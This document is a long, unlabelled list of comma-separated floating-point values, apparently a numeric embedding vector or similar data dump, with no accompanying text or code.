-0.04300004988908768, -0.011929304338991642, -0.010052063502371311, 0.024035101756453514, 0.007320437114685774, 0.007601221092045307, 0.018242930993437767, -0.015130240470170975, -0.009145532734692097, 0.02880040556192398, -0.008126688189804554, -0.008928927592933178, 0.011688632890582085, 0.01822688616812229, -0.012835835106670856, 0.0017629216890782118, 0.02657017856836319, 0.0051985131576657295, 0.0016977398190647364, 0.01837128959596157, 0.006514186505228281, -0.021467935293912888, -0.002286383183673024, -0.025976521894335747, 0.021612336859107018, -0.0071479557082057, 0.021724650636315346, -0.000004250146957929246, 0.014488449320197105, -0.020088082179427147, -0.015635652467608452, -0.006690679118037224, 0.0019133416935801506, 0.0035138099920004606, 0.00213796878233552, 0.006815026048570871, 0.001055947970598936, -0.01752091571688652, -0.006586387753486633, -0.026265328750014305, 0.0016766809858381748, -0.002581206150352955, 0.013028373010456562, -0.030180256813764572, 0.004007187206298113, 0.019093304872512817, 0.002533071907237172, 0.020232485607266426, -0.0012103791814297438, 0.021788829937577248, -0.01306848507374525, -0.020729873329401016, -0.02458062395453453, -0.012539006769657135, 0.001165253110229969, -0.007464840542525053, -0.004652990493923426, -0.007898049429059029, -0.0015784066636115313, 0.005752058699727058, 0.01830711029469967, -0.012025573290884495, -0.010044041089713573, -0.0015152302803471684, 0.004604856017976999, -0.006145155988633633, 0.024211594834923744, -0.010533407330513, 0.011808968149125576, -0.009995906613767147, 0.01570785418152809, -0.019269797950983047, 0.025992566719651222, -0.011560274288058281, 0.006012786645442247, -0.008263069204986095, 0.022398533299565315, -0.004616889636963606, 0.009346092119812965, -0.004053316079080105, 0.008158777840435505, 0.012795723043382168, 0.007990307174623013, -0.019237708300352097, 0.005238625220954418, -0.015050017274916172, 0.01720001921057701, -0.01702352613210678, 0.021516067907214165, -0.013212887570261955, -0.010653743520379066, -0.006674634292721748, -0.012490872293710709, -0.020296664908528328, 0.013028373010456562, -0.0004016212478745729, -0.0003003384917974472, -0.00008172816887963563, -0.004115489777177572, 0.005495341960340738, 0.0016556221526116133, 0.055033642798662186, 0.01388676930218935, 0.023425398394465446, -0.000011359839845681563, 0.010276691056787968, -0.00475327018648386, -0.001021351432427764, -0.02202950231730938, 0.008896837942302227, 0.002186103258281946, 0.00637780549004674, -0.001440020278096199, 0.02454853430390358, 0.012129864655435085, 0.004881628789007664, 0.0004610371252056211, 0.011552251875400543, 0.007135922089219093, -0.008640121668577194, 0.012370536103844643, -0.01196941640228033, -0.010003929026424885, -0.0009616848547011614, 0.006883216556161642, 0.0057199690490961075, -0.0029963653068989515, 0.012956171296536922, -0.0027256093453615904, 0.04287169128656387, 0.0028900685720145702, -0.00814273301512003, -0.00916959997266531, 0.0006658589700236917, -0.0030424941796809435, 0.004376217722892761, -0.007954206317663193, 0.00629758182913065, 0.02121121808886528, -0.013597963377833366, -0.005435173865407705, -0.004372206516563892, -0.0035900226794183254, 0.01083825808018446, -0.01872427389025688, 0.002948230830952525, 0.00847967341542244, 0.00005791167859570123, -0.0026594246737658978, -0.02791794203221798, 0.004673046059906483, 0.01083825808018446, 0.02039293386042118, -0.009634898975491524, 0.013565873727202415, -0.017007481306791306, 0.006357749458402395, -0.012996283359825611, -0.0012484855251386762, 0.00663452222943306, -0.003355367574840784, -0.022077636793255806, 0.009482473134994507, -0.03026048094034195, -0.016654497012495995, -0.0012244184035807848, -0.011399826034903526, 0.0025170270819216967, -0.007035642396658659, -0.0029863372910767794, -0.007063720375299454, 0.018258975818753242, -0.005824260413646698, 0.0062093352898955345, 0.0021219239570200443, 0.007869971916079521, -0.00468106847256422, 0.018002258613705635, 0.022815696895122528, 0.014496471732854843, 0.011648520827293396, 0.025559356436133385, -0.005270714871585369, 0.020408978685736656, -0.007055697962641716, -0.03805825114250183, 0.00888881552964449, -0.010830235667526722, -0.011311579495668411, -0.003816655371338129, 0.005391050595790148, 0.004267915152013302, 0.006293570622801781, 0.0025110102724283934, 0.02252689003944397, 0.006999541539698839, 0.002888062968850136, -0.0008975056698545814, 0.0017679356969892979, -0.00015568464004900306, -0.006851126905530691, -0.0185477826744318, 0.022366443648934364, -0.01268340926617384, -0.021291442215442657, -0.012883969582617283, -0.005623700097203255, -0.013975015841424465, 0.002276355167850852, 0.01160038635134697, -0.01104684080928564, 0.012547029182314873, -0.018964946269989014, -0.0060408650897443295, -0.015178374946117401, 0.017296288162469864, 0.014721098355948925, 0.025061968713998795, -0.00865616649389267, 0.003469686722382903, -0.004861572757363319, -0.001170267118141055, 0.01620524190366268, 0.003313249908387661, -0.03324481472373009, -0.019173528999090195, 0.006433962378650904, -0.03420750051736832, 0.009747212752699852, 0.00039560446748510003, 0.004765303805470467, 0.007657377980649471, 0.0060087754391133785, -0.01319684274494648, 0.01763322949409485, -0.015009905211627483, 0.011415870860219002, 0.012675386853516102, -0.002097856719046831, 0.01183303538709879, 0.007673422805964947, 0.0176974069327116, -0.004540676716715097, -0.00034320817212574184, 0.027548911049962044, -0.0014380146749317646, -0.010453183203935623, 0.017248153686523438, 0.022783607244491577, -0.00006944387132534757, 0.011961393989622593, 0.015033972449600697, -0.017248153686523438, 0.00813872180879116, -0.014616806991398335, 0.0007846907246857882, 0.008840681985020638, -0.0010519367642700672, 0.014311956241726875, 0.007609243504703045, -0.015170352533459663, -0.008038441650569439, 0.008182845078408718, -0.008640121668577194, -0.0014390174765139818, -0.010228556580841541, 0.02068173885345459, 0.005583588499575853, -0.0032430540304630995, 0.02419555000960827, -0.009835458360612392, -0.012908036820590496, -0.032859738916158676, -0.018451513722538948, -0.0031207124702632427, -0.0050902110524475574, 0.022639203816652298, -0.005812226794660091, 0.003957047127187252, 0.00035398826003074646, 0.021756740286946297, 0.02653808891773224, -0.0012815779773518443, -0.0202485304325819, 0.025334730744361877, 0.011768856085836887, -0.00589646166190505, 0.022687338292598724, 0.015956547111272812, 0.0016887146048247814, 0.015868300572037697, -0.010517362505197525, 0.005856349598616362, -0.012418670579791069, -0.021548157557845116, 0.008303181268274784, 0.00021597796876449138, -0.0029903484974056482, -0.005571554880589247, -0.00475327018648386, -0.01904517039656639, -0.01042911596596241, 0.008808592334389687, -0.010886392556130886, -0.0084074717015028, -0.011480050161480904, 0.0031006564386188984, -0.016084905713796616, 0.006293570622801781, -0.012418670579791069, -0.006417917553335428, -0.014255799353122711, 0.005411106627434492, 0.014753188006579876, -0.00241273595020175, -0.006080977153033018, -0.008359338156878948, -0.005515397991985083, -0.01901308074593544, 0.00600476423278451, -0.021114949136972427, 0.007035642396658659, -0.0014861490344628692, 0.0021239295601844788, 0.0010800152085721493, 0.006185268051922321, 0.026826895773410797, 0.003108678851276636, 0.016590317711234093, -0.010637698695063591, -0.0024448256008327007, 0.005844316445291042, -0.008503740653395653, -0.011054863221943378, 0.005651778541505337, 0.009105420671403408, 0.0031728579197078943, 0.021163083612918854, 0.015082105994224548, -0.035876158624887466, 0.0033292947337031364, -0.00408741133287549, 0.001997576793655753, -0.00014377640036400408, -0.008194878697395325, 0.025318685919046402, 0.020553382113575935, -0.0008929930627346039, 0.015539382584393024, -0.02323286235332489, -0.000027812020562123507, -0.004163624253123999, 0.009955794550478458, 0.017536960542201996, -0.010437138378620148, -0.0015894373646005988, 0.010541429743170738, 0.01019646693021059, -0.002922158222645521, -0.014416247606277466, -0.029169434681534767, -0.01176083367317915, 0.0012444743188098073, 0.009225756861269474, -0.01322893239557743, 0.028367195278406143, -0.01457669585943222, 0.009875570423901081, 0.003788576927036047, 0.006389839109033346, -0.00056658178800717, 0.0011632476234808564, -0.008391426876187325, -0.01436811313033104, 0.009747212752699852, -0.006526220124214888, 0.00933004729449749, 0.006193290464580059, 0.0035799946635961533, -0.008122676983475685, 0.01306848507374525, -0.003477709135040641, 0.0041074673645198345, -0.007841893471777439, -0.015988636761903763, -0.009538630023598671, -0.0028539677150547504, 0.007749635726213455, 0.01638173498213291, 0.021901143714785576, 0.011127064935863018, -0.021628381684422493, -0.005427151452749968, -0.0035940338857471943, 0.00016784359468147159, -0.010100197978317738, -0.004372206516563892, -0.008447583764791489, 0.007320437114685774, -0.008239001967012882, -0.005262692458927631, -0.009955794550478458, 0.004007187206298113, 0.02490152046084404, 0.014095352031290531, -0.01344553753733635, 0.0034937539603561163, -0.0016335606342181563, 0.017761586233973503, -0.007304392289370298, 0.005876405630260706, -0.005744036287069321, 0.00943433865904808, 0.011239377781748772, 0.0015603562351316214, -0.011215311475098133, -0.006714746356010437, -0.005916517693549395, -0.0057199690490961075, 0.008800569921731949, 0.026056746020913124, 0.015459159389138222, -0.005130323115736246, 0.016197219491004944, 0.025318685919046402, 0.007934150286018848, -0.01411941833794117, 0.018708229064941406, -0.017071660608053207, -0.0007014583679847419, 0.005535454023629427, 0.009650943800807, -0.01610897295176983, -0.002938202815130353, 0.0252545066177845, -0.0070717427879571915, 0.001806042157113552, 0.0018070449586957693, 0.007886016741394997, -0.007918105460703373, 0.0020076048094779253, 0.0010318808490410447, 0.003112690057605505, -0.024917565286159515, -0.00711185485124588, -0.014937703497707844, -0.031367573887109756, 0.001284586382098496, 0.00541912904009223, -0.013076507486402988, -0.004604856017976999, 0.01289199199527502, 0.0016104961978271604, -0.03764108568429947, 0.014680986292660236, -0.004356161691248417, -0.0010449172696098685, 0.000621735758613795, 0.03143175318837166, 0.0005455230129882693, 0.006080977153033018, 0.00559562211856246, -0.017713451758027077, -0.014624829404056072, 0.008712323382496834, 0.015378935262560844, 0.00663452222943306, 0.018387334421277046, 0.010469228029251099, -0.013076507486402988, 0.009747212752699852, 0.007292358670383692, 0.027051523327827454, -0.001874232548289001, -0.0021098903380334377, -0.007284336723387241, 0.013100574724376202, 0.025848163291811943, 0.007444784510880709, -0.007504952605813742, 0.0009807380847632885, 0.01457669585943222, -0.031158989295363426, -0.01234646886587143, -0.0261369701474905, -0.004580788780003786, 0.0031146956607699394, -0.0029502364341169596, 0.022109726443886757, -0.006173234432935715, 0.021018680185079575, -0.029698913916945457, 0.0036822801921516657, 0.005322860553860664, -0.025767939165234566, 0.02170860581099987, 0.005254670046269894, 0.010372959077358246, 0.006313626654446125, -0.008487695828080177, -0.005603644531220198, 0.00015367903688456863, -0.013573896139860153, 0.028784360736608505, 0.006742824800312519, 0.0021840976551175117, -0.009995906613767147, 0.018066437914967537, -0.021901143714785576, 0.01670263148844242, 0.003802616149187088, 0.019927633926272392, -0.005362972617149353, -0.009763257578015327, -0.00460084481164813, 0.022222040221095085, 0.007340493146330118, -0.02604070119559765, -0.0008518782560713589, 0.0011853091418743134, 0.012442737817764282, -0.0066104549914598465, -0.023104503750801086, -0.01330113410949707, -0.004372206516563892, 0.03420750051736832, -0.007677434012293816, -0.006538253743201494, -0.0019534537568688393, -0.01009217556566, 0.013926881365478039, 0.004861572757363319, -0.027581000700592995, -0.011295534670352936, -0.0020406972616910934, 0.008230979554355145, 0.01271549891680479, -0.0012996282894164324, 0.004725191742181778, 0.012402625754475594, 0.003269126871600747, 0.005643756128847599, 0.019670916721224785, -0.01525057666003704, 0.0006021811859682202, -0.013798522762954235, 0.0016024737851694226, 0.009410271421074867, 0.0016666529700160027, 0.005403084214776754, -0.029426151886582375, 0.004263903945684433, -0.020489202812314034, -0.005884428042918444, -0.031447798013687134, 0.004472486209124327, -0.004043288063257933, 0.00009564201172906905, -0.0054311626590788364, -0.014817367307841778, 0.008050475269556046, -0.019767185673117638, -0.0004813438281416893, 0.007460829336196184, 0.019029125571250916, 0.0007210129406303167, 0.00025232945336028934, -0.03067764639854431, -0.015635652467608452, -0.013148708269000053, -0.01344553753733635, -0.013212887570261955, 0.018210841342806816, 0.008840681985020638, 0.021435845643281937, -0.000589646166190505, 0.0044243517331779, -0.016654497012495995, 0.022189950570464134, 0.017472781240940094, 0.0017438685754314065, -0.0004800903261639178, -0.01104684080928564, -0.004420340992510319, -0.010204489342868328, 0.0013447542442008853, -0.008936950005590916, -0.004135545808821917, 0.012883969582617283, -0.014697031117975712, 0.030356749892234802, 0.016943302005529404, -0.0006247441633604467, -0.00943433865904808, 0.01979927532374859, 0.003949024714529514, -0.007512975018471479, -0.0014871518360450864, -0.03245861828327179, -0.02220599539577961, 0.0006473071407526731, -0.00777771370485425, -0.01716792955994606, -0.02199741266667843, 0.016798898577690125, -0.015170352533459663, -0.021724650636315346, -0.02429181896150112, 0.0353306382894516, -0.0006392847863025963, 0.011913259513676167, -0.006662600673735142, 0.038860492408275604, 0.017970168963074684, 0.011167176999151707, -0.020376889035105705, 0.006145155988633633, 0.003584005869925022, 0.007348515558987856, 0.006646555848419666, 0.03216981142759323, 0.025479132309556007, -0.02578398399055004, 0.009538630023598671, 0.005310826934874058, -0.00015004389570094645, 0.0042478591203689575, 0.011520162224769592, -0.009723145514726639, -0.00489366240799427, 0.009731167927384377, -0.012763633392751217, 0.006706723943352699, -0.0026854975149035454, -0.01755300536751747, 0.0041054617613554, -0.013244977220892906, 0.008335270918905735, 0.0018250952707603574, 0.0029682868625968695, -0.027195926755666733, 0.017761586233973503, -0.009658966213464737, 0.005443196278065443, -0.004528643097728491, -0.012747588567435741, 0.005679856985807419, -0.0035619442351162434, 0.0003813145449385047, 0.0017238125437870622, -0.00044674723176285625, -0.001330715138465166, -0.006522208917886019, 0.019959723576903343, 0.011784900911152363, -0.001549325417727232, -0.010212511755526066, -0.007605232298374176, -0.0038688010536134243, 0.019077260047197342, -0.0065302313305437565, 0.008704300969839096, -0.010084153153002262, -0.011905237101018429, -0.004428362939506769, -0.00040538175380788743, 0.0041876910254359245, 0.005286759696900845, -0.013293111696839333, -0.0053990730084478855, -0.007553086616098881, -0.016750764101743698, 0.011167176999151707, -0.025270551443099976, -0.010918482206761837, 0.004809427075088024, -0.02401905693113804, -0.0072522470727562904, -0.009474450722336769, -0.0045085870660841465, 0.009354114532470703, -0.012081730179488659, -0.033854514360427856, -0.0011482055997475982, -0.005988719407469034, 0.007416706066578627, 0.0007922116783447564, 0.007356537971645594, -0.015483226627111435, 0.008303181268274784, 0.008952994830906391, -0.003912924323230982, 0.01142389327287674, -0.017793675884604454, -0.004147579427808523, 0.004620900843292475, -0.002976309275254607, -0.010934527032077312, 0.018098527565598488, 0.0006703715771436691, 0.011327624320983887, 0.004031254444271326, -0.0009501526365056634, 0.000536999199539423, 0.013926881365478039, -0.012739566154778004, -0.0036221123300492764, 0.004661012440919876, -0.010637698695063591, -0.023601891472935677, 0.015908412635326385, -0.0011090963380411267, 0.0056076557375490665, 0.01752091571688652, -0.022318309172987938, -0.0046570017002522945, 0.013902814127504826, -0.01951047033071518, 0.005106255877763033, 0.012105797417461872, -0.005703924223780632, 0.027645180001854897, -0.0017448713770136237, 0.008904860354959965, 0.005575566086918116, 0.015723899006843567, 0.021018680185079575, 0.01463285181671381, -0.008632099255919456, -0.004179669078439474, 0.014841434545814991, -0.007168011739850044, -0.031239213421940804, 0.0007360549061559141, 0.007272303104400635, -0.001079012406989932, 0.010116242803633213, -0.005274726077914238, 0.01663845218718052, 0.01432800106704235, -0.005563532467931509, -0.009354114532470703, -0.03149593248963356, 0.007224168628454208, 0.016798898577690125, -0.01075001247227192, 0.01395897101610899, -0.025126148015260696, -0.009747212752699852, -0.008696278557181358, -0.007115866057574749, 0.0037645099218934774, -0.009907660074532032, -0.010517362505197525, -0.014319978654384613, -0.000868424482177943, 0.0003554924624040723, -0.009354114532470703, 0.009322024881839752, -0.0012675387552008033, -0.017007481306791306, -0.011696655303239822, 0.0004026240494567901, -0.011415870860219002, 0.0019354033283889294, 0.042550794780254364, -0.009474450722336769, -0.0025892285630106926, 0.0138546796515584, -0.011664565652608871, 0.023361220955848694, -0.02267129346728325, -0.011512139812111855, 0.0001258513511857018, 0.00957874208688736, -0.008222957141697407, -0.0012133875861763954, -0.003616095520555973, -0.004665023647248745, 0.007781724911183119, -0.005928551312536001, -0.0028399284929037094, 0.008182845078408718, -0.016686586663126945, 0.008375382050871849, -0.000014947981981094927, 0.010517362505197525, 0.0017930057365447283, -0.02791794203221798, 0.018114572390913963, 0.003154807724058628, 0.018258975818753242, -0.006766892038285732, 0.0017057621153071523, -0.01067781075835228, 0.020088082179427147, 0.009161577560007572, -0.0184836033731699, -0.0006498141447082162, -0.035844068974256516, 0.007119877263903618, -0.011800945736467838, -0.004376217722892761, -0.004215769469738007, 0.010509340092539787, -0.010918482206761837, -0.01614106260240078, -0.0018120589666068554, 0.009193667210638523, 0.015611584298312664, 0.027853762730956078, -0.027115702629089355, -0.00213796878233552, -0.0029863372910767794, 0.002220198279246688, 0.01933397725224495, 0.00011726488446583971, -0.02847950905561447, 0.01570785418152809, 0.0027597045991569757, -0.023457488045096397, -0.007934150286018848, -0.015194419771432877, 0.004685079678893089, 0.012539006769657135, -0.013437515124678612, -0.0007997326902113855, 0.0011662559118121862, -0.012402625754475594, 0.0004805917269550264, -0.01649404875934124, 0.012466805055737495, 0.0027576989959925413, 0.005876405630260706, 0.010389003902673721, -0.00005897715163882822, -0.0031387628987431526, 0.0023325118236243725, 0.01571587659418583, 0.008864748291671276, 0.007669411599636078, -0.008567919954657555, -0.03658213093876839, 0.006770903244614601, 0.009731167927384377, 0.003914929926395416, -0.00865616649389267, 0.005342916585505009, 0.018900766968727112, 0.01050131767988205, 0.009875570423901081, 0.014817367307841778, 0.016060838475823402, 0.0017859861254692078, 0.00773359090089798, -0.011375758796930313, -0.00552342040464282, 0.004147579427808523, 0.008575942367315292, 0.02458062395453453, 0.01678285375237465, 0.036164965480566025, -0.012883969582617283, -0.018435468897223473, 0.018291065469384193, -0.024452265352010727, 0.0034757035318762064, 0.03026048094034195, -0.014536583796143532, -0.02259106934070587, 0.015386957675218582, 0.0285918228328228, -0.004921740386635065, 0.010389003902673721, -0.0034496306907385588, -0.016052816063165665, -0.009490495547652245, -0.003551916219294071, 0.009819413535296917, -0.009089375846087933, -0.006666611880064011, 0.00340951862744987, 0.004881628789007664, -0.016429869458079338, -0.0029000965878367424, -0.028030255809426308, -0.013004305772483349, 0.005535454023629427, -0.010934527032077312, -0.008600009605288506, 0.007500941399484873, -0.011311579495668411, 0.00027326290728524327, -0.006847115699201822, -0.008202901110053062, 0.004885639995336533, -0.006169223226606846, 0.019735096022486687, -0.005900472868233919, -0.019061215221881866, 0.036903027445077896, 0.010741990059614182, -0.006786948069930077, -0.011399826034903526, -0.0079662399366498, 0.013124641962349415, -0.0025852173566818237, 0.016798898577690125, 0.0049377852119505405, 0.013220909982919693, 0.007063720375299454, 0.0019093304872512817, 0.00016220283578149974, -0.01252296194434166, 0.006778925657272339, -0.0031788747292011976, 0.006674634292721748, 0.007079765200614929, -0.010461205616593361, 0.0008839678484946489, 0.014271844178438187, 0.01163247600197792, -0.013533784076571465, 0.009482473134994507, 0.013509716838598251, 0.00013262024731375277, -0.0010609619785100222, 0.027789583429694176, 0.004813438281416893, -0.00537500623613596, 0.007115866057574749, -0.00018037858535535634, -0.016734719276428223, 0.021050769835710526, 0.006313626654446125, -0.00933004729449749, 0.004977897275239229, -0.027179881930351257, -0.0028218780644237995, -0.005062132608145475, 0.013389380648732185, 0.0009140518377535045, -0.0062414249405264854, -0.012081730179488659, 0.0019534537568688393, -0.007244224660098553, 0.01720001921057701, 0.01057351939380169, 0.003531860187649727, 0.00179601414129138, 0.004360172897577286, 0.020296664908528328, -0.009450383484363556, 0.019414201378822327, 0.00537500623613596, -0.011135087348520756, 0.014608784578740597, 0.007384616415947676, -0.000351982656866312, -0.019494425505399704, -0.026698537170886993, 0.010044041089713573, 0.009185644797980785, 0.023104503750801086, 0.005110267084091902, 0.013100574724376202, 0.006706723943352699, -0.008190867491066456, 0.009835458360612392, -0.01720001921057701, 0.012234155088663101, 0.00567584577947855, 0.009041241370141506, 0.017617184668779373, 0.022189950570464134, -0.008624076843261719, 0.009514562785625458, 0.0054592411033809185, 0.014961770735681057, 0.0018531737150624394, -0.013686208985745907, -0.011712699197232723, 0.005848327651619911, 0.022157860919833183, 0.007553086616098881, 0.016429869458079338, 0.013285089284181595, -0.011111020110547543, 0.0285918228328228, -0.014344045892357826, 0.018323155120015144, 0.02121121808886528, -0.014945725910365582, 0.00968303345143795, -0.005042076576501131, -0.02252689003944397, 0.006742824800312519, 0.01716792955994606, -0.006690679118037224, -0.0034355914685875177, -0.003098650835454464, -0.00008229224476963282, 0.0008985084714367986, 0.01833919994533062, -0.00792612787336111, -0.007617265917360783, -0.018291065469384193, -0.04919333755970001, 0.01578807644546032, 0.003545899409800768, 0.014929681085050106, -0.0072522470727562904, -0.016189197078347206, 0.03026048094034195, -0.007143944501876831, 0.01699143648147583, 0.005467263516038656, 0.01200952846556902, -0.01918957382440567, 0.0038547618314623833, 0.007456818129867315, 0.007785736117511988, 0.01830711029469967, -0.008343293331563473, -0.015154307708144188, 0.0227675624191761, 0.0011141103459522128, -0.0033433339558541775, -0.014817367307841778, -0.021483980119228363, 0.009370159357786179, 0.019350022077560425, -0.0082109235227108, 0.009723145514726639, -0.021307487040758133, -0.005366983823478222, 0.001759913400746882, -0.0073926388286054134, -0.011656543239951134, 0.0011953371576964855, -0.010701877996325493, -0.01252296194434166, -0.018066437914967537, -0.008054486475884914, 0.017424646764993668, -0.005772114731371403, 0.0004427360254339874, 0.0025350775104016066, 0.020729873329401016, 0.0019845403730869293, 0.004263903945684433, 0.013413447886705399, -0.02053733728826046, 0.002934191608801484, 0.01220206543803215, -0.00975523516535759, -0.006550287362188101, 0.006746836006641388, -0.005988719407469034, 0.02220599539577961, -0.01962278224527836, 0.004364184103906155, 0.014520538970828056, 0.0022282206919044256, -0.018756363540887833, -0.018644049763679504, 0.01670263148844242, 0.010413071140646935, -0.007340493146330118, -0.0036622241605073214, -0.014504494145512581, -0.006923328619450331, 0.006590398959815502, -0.003770526498556137, 0.005575566086918116, 0.0006758869276382029, -0.002000585198402405, -0.0042037358507514, -0.006919317413121462, 0.0159966591745615, -0.011062885634601116, -0.0049698748625814915, -0.006333682686090469, -0.007196090184152126, 0.013485649600625038, 0.009819413535296917, 0.005996741820126772, -0.00766138918697834, 0.007428739685565233, -0.006550287362188101, 0.01220206543803215, -0.009715123102068901, -0.011199266649782658, -0.008575942367315292, 0.010669788345694542, -0.0142959114164114, 0.0038367114029824734, 0.010188444517552853, 0.02348957769572735, -0.0053990730084478855, 0.0028599845245480537, -0.0058082155883312225, -0.005210546776652336, -0.015266621485352516, 0.005507375579327345, -0.014079307205975056, 0.017905989661812782, -0.005699913017451763, -0.023682115599513054, -0.002733631758019328, -0.005723980255424976, -0.002111895941197872, 0.006129111163318157, 0.0006683659739792347, -0.01787390001118183, -0.02979518286883831, -0.015908412635326385, 0.013293111696839333, 0.007340493146330118, 0.011391803622245789, -0.0018431456992402673, -0.017248153686523438, -0.011744788847863674, 0.007537041790783405, 0.0084074717015028, -0.011640498414635658, 0.0030144157353788614, 0.001306647900491953, 0.009723145514726639, 0.008519785478711128, 0.02153211273252964, -0.016293488442897797, -0.008600009605288506, -0.006726779974997044, -0.01837128959596157, -0.0437060184776783, 0.012234155088663101, 0.023457488045096397, 0.0142959114164114, 0.0013868719106540084, 0.0227033831179142, 0.00773359090089798, -0.012177999131381512, 0.008343293331563473, 0.0164218470454216, -0.004328083246946335, -0.014512516558170319, 0.0061812568455934525, -0.021933233365416527, 0.022976145148277283, -0.011480050161480904, -0.0018932856619358063, -0.031768690794706345, 0.0028258892707526684, 0.015242554247379303, 0.02138771116733551, 0.02252689003944397, -0.0028359172865748405, 0.0033252835273742676, -0.007492918986827135, 0.01138378120958805, -0.0008909874595701694, 0.005848327651619911, 0.012795723043382168, 0.0008558894624002278, 0.011464005336165428, -0.013718298636376858, -0.0040934281423687935, 0.011263445019721985, 0.004757281392812729, 0.0235216673463583, 0.007416706066578627, 0.0006312623736448586, 0.0013297123368829489, -0.0113516915589571, -0.006229391321539879, 0.009121465496718884, 0.014656919054687023, -0.009289936162531376, -0.029923541471362114, 0.010027996264398098, -0.011135087348520756, 0.007753646932542324, -0.017151884734630585, -0.03366197645664215, 0.0015663730446249247, -0.0015342833939939737, -0.005062132608145475, 0.013100574724376202, 0.006305604241788387, -0.004151590634137392, -0.017183974385261536, -0.003391468431800604, 0.015940502285957336, -0.001463084714487195, -0.020874276757240295, 0.03590824827551842, 0.019414201378822327, 0.033854514360427856, 0.01505803968757391, -0.011367736384272575, 0.0015503282193094492, 0.0032911882735788822, 0.010950571857392788, -0.003501776373013854, -0.01901308074593544, -0.022928010672330856, 0.012498894706368446, 0.027195926755666733, -0.0024287807755172253, 0.009129487909376621, 0.01200952846556902, -0.007492918986827135, 0.01211381983011961, -0.015098150819540024, 0.006606443785130978, 0.023537712171673775, 0.022189950570464134, -0.007396650034934282, 0.006915306206792593, -0.018467558547854424, 0.013365313410758972, 0.009995906613767147, -0.005370995029807091, 0.009177622385323048, -0.002783771837130189, 0.02660226821899414, 0.0218850988894701, -0.0045366655103862286, -0.0008017382933758199, 0.014969793148338795, -0.021692560985684395, -0.028254881501197815, 0.010453183203935623, 0.0022683327551931143, -0.017793675884604454, 0.02788585238158703, 0.007416706066578627, 0.015547404997050762, -0.009057286195456982, 0.004408307373523712, 0.007380605209618807, 0.0008553880616091192, 0.004733214154839516, -0.020970545709133148, 0.0020447084680199623, -0.008559897541999817, 0.0252545066177845, -0.002038691658526659, -0.004661012440919876, -0.014103373512625694, -0.009089375846087933, 0.003144779708236456, 0.06055305153131485, 0.0054873195476830006, -0.01310859713703394, -0.014344045892357826, 0.009883592836558819, 0.00043020103476010263, -0.022799652069807053, 0.005908495280891657, -0.010100197978317738, 0.014344045892357826, 0.010140310041606426, -0.008415494114160538, 0.008271091617643833, 0.018291065469384193, -0.0020076048094779253, -0.002238248707726598, 0.03504183143377304, 0.0006588393589481711, 0.0037424482870846987, -0.00663452222943306, 0.0005480300169438124, -0.005050098989158869, -0.005350938998162746, -0.002166047226637602, -0.00241273595020175, -0.008744413033127785, -0.000671875779516995, -0.008058497682213783, -0.027757493779063225, 0.005631722509860992, 0.009289936162531376, -0.0013587934663519263, -0.007504952605813742, -0.007027619984000921, -0.012033595703542233, 0.0063497270457446575, -0.009129487909376621, 0.006353738252073526, 0.00024255216703750193, 0.014721098355948925, -0.005423140246421099, -0.021596292033791542, 0.012603186070919037, 0.0069915191270411015, -0.01965487189590931, -0.009161577560007572, -0.0008232984691858292, -0.009490495547652245, -0.011415870860219002, 0.007468851748853922, -0.0025451055262237787, 0.017216064035892487, -0.007781724911183119, -0.015098150819540024, 0.025174282491207123, 0.016116995364427567, 0.004235825501382351, 0.006490119267255068, 0.0013186815194785595, -0.012835835106670856, 0.008696278557181358, 0.006618477404117584, -0.006405883934348822, 0.016863077878952026, -0.011062885634601116, 0.002561150351539254, -0.013662141747772694, -0.0034797147382050753, -0.0008929930627346039, -0.004669034853577614, -0.016092928126454353, -0.027677269652485847, 0.024708982557058334, 0.010669788345694542, -0.00010855306027224287, 0.009209712035953999, 0.013148708269000053, 0.0092738913372159, -0.013533784076571465, -0.007324448321014643, 0.025174282491207123, -0.022928010672330856, 0.0049097067676484585, 0.011271467432379723, 0.006429951172322035, 0.0051704347133636475, -0.020200395956635475, -0.0073685715906322, -0.004151590634137392, 0.018740318715572357, 0.006137133575975895, -0.005395061802119017, -0.019943678751587868, -0.018355244770646095, 0.01922166347503662, 0.0008955000666901469, -0.005535454023629427, 0.001718798535875976, 0.018628006801009178, -0.01176083367317915, 0.005479297135025263, -0.012033595703542233, 0.029506376013159752, 0.013461582362651825, -0.005395061802119017, 0.022542934864759445, -0.01505803968757391, 0.013670164160430431, 0.02124330773949623, -0.020778007805347443, -0.0010709899943321943, -0.002912130206823349, -0.020376889035105705, 0.009249824099242687, -0.008042452856898308, -0.011415870860219002, -0.00711185485124588, -0.025639580562710762, 0.009522585198283195, 0.0009937743889167905, 0.013605985790491104, 0.014127440750598907, 0.01795412413775921, -0.01152818463742733, 0.00541912904009223, -0.019077260047197342, 0.01012426521629095, 0.003979108761996031, -0.02164442650973797, -0.008311203680932522, 0.00872836820781231, 0.001302636694163084, 0.015475204214453697, -0.007216146215796471, 0.0638582780957222, -0.002733631758019328, 0.004624912049621344, -0.00940224900841713, -0.006313626654446125, 0.006417917553335428, -0.009137510322034359, -0.025976521894335747, -0.017681363970041275, -0.008624076843261719, -0.013100574724376202, -0.002533071907237172, 0.005354950204491615, -0.007950195111334324, 0.004725191742181778, 0.002942214021459222, 0.0020998623222112656, 0.00303647737018764, -0.02756495587527752, -0.003359378781169653, -0.01009217556566, -0.015122218057513237, 0.020088082179427147, 0.0059486073441803455, 0.0046289232559502125, 0.012835835106670856, -0.010220534168183804, 0.017713451758027077, -0.007035642396658659, -0.013293111696839333, 0.016197219491004944, 0.011664565652608871, -0.0033573731780052185, 0.010100197978317738, 0.00634170463308692, 0.016606362536549568, -0.0038146497681736946, 0.023040324449539185, -0.02308845892548561, -0.01488154660910368, 0.023682115599513054, 0.007091798819601536, -0.0017298293532803655, -0.004075377713888884, -0.0017478797817602754, 0.004127523396164179, 0.010549452155828476, -0.014560651034116745, 0.018563827499747276, -0.018563827499747276, -0.004207747057080269, 0.01009217556566, 0.005772114731371403, -0.012916059233248234, 0.006325660273432732, -0.011897214688360691, -0.004384240135550499, -0.010252623818814754, -0.014199642464518547, 0.0004978899960406125, 0.007208123803138733, -0.0034476250875741243, -0.006883216556161642, 0.012338446453213692, -0.0012865918688476086, 0.009538630023598671, 0.028046300634741783, 0.020489202812314034, -0.03204145282506943, 0.005102244671434164, 0.013092552311718464, -0.01610095053911209, -0.00807053130120039, 0.007091798819601536, -0.022334353998303413, -0.019237708300352097, 0.012081730179488659, -0.01119124423712492, 0.0019504452357068658, 0.02206159196794033, -0.01406326238065958, -0.025350773707032204, -0.0045085870660841465, -0.002290394390001893, 0.012506917119026184, -0.014584717340767384, -0.013862702064216137, 